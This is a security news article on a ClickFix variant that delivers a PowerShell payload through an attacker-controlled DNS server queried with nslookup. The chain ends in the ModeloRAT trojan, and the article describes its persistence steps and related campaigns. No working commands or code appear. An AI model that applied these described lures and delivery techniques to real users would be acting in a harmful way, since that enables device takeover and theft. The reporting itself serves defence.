New ClickFix Attack Uses nslookup to Steal Data via DNS

Cybersecurity researchers have uncovered a significant evolution in the notorious ClickFix social engineering campaigns, where attackers are now leveraging DNS queries to deliver malicious payloads. This marks the first documented instance of DNS being weaponized as a primary communication channel within these attacks, introducing a new layer of stealth and evasion. The technique involves tricking users into executing a seemingly benign command that secretly fetches and runs a harmful script from a rogue DNS server.

In this newly observed variant, the threat actors instruct their targets to run a specific nslookup command from the Windows Run dialog box. This command is configured to query a DNS server under the attacker’s control, rather than the system’s legitimate resolver. The response from this malicious server contains a hidden PowerShell script embedded within the DNS record’s “NAME:” field. Once the command is executed, this script is automatically parsed and run by the Windows command interpreter, initiating the infection chain.

Microsoft’s Threat Intelligence team detailed this method, noting that while the exact social engineering lure remains unclear, the attack manipulates users into believing they are fixing an error or enabling a feature. The command directs a lookup for a hostname like “example.com” to the attacker’s IP address, 84[.]21.189[.]20. Although this particular server is now offline, its response was designed to download additional malware from compromised infrastructure.

The second-stage PowerShell command retrieved a ZIP archive containing a Python runtime and malicious scripts. These tools perform reconnaissance on the infected device and its domain. To maintain access, the attack establishes persistence by creating a VBScript file in the user’s AppData folder and a shortcut in the Startup directory, ensuring the malware launches automatically with Windows. The ultimate payload deployed is ModeloRAT, a remote access trojan that grants attackers full remote control over the compromised system.

This approach represents a stark departure from traditional ClickFix attacks, which typically retrieve payloads over HTTP. By using DNS as a delivery channel, attackers can dynamically modify their scripts and blend malicious traffic with legitimate, everyday DNS queries, making detection significantly more challenging for security tools.

The ClickFix threat landscape is evolving at a rapid pace. Over the past year, attackers have continuously experimented with new delivery methods and payloads, targeting a broad range of operating systems. Earlier campaigns relied on convincing users to run PowerShell or shell commands directly. More recent iterations have expanded into novel territories.

For instance, a campaign dubbed “ConsentFix” abused the Azure CLI OAuth application to hijack Microsoft accounts, bypassing passwords and multi-factor authentication entirely. Threat actors have also capitalized on the popularity of AI tools, using shared pages for platforms like ChatGPT, Grok, and Claude Artifacts to promote fake technical guides that lead to ClickFix attacks.

In a separate development, researchers reported a ClickFix campaign promoted through comments on Pastebin. This attack targeted cryptocurrency users, tricking them into executing malicious JavaScript directly within their browser while visiting a cryptocurrency exchange. The script was designed to hijack transactions, representing one of the first ClickFix campaigns focused on manipulating web application functionality in real-time rather than deploying traditional malware onto a system. This shift highlights the attackers’ adaptability in exploiting different technologies and user behaviors to achieve their objectives.

(Source: Bleeping Computer)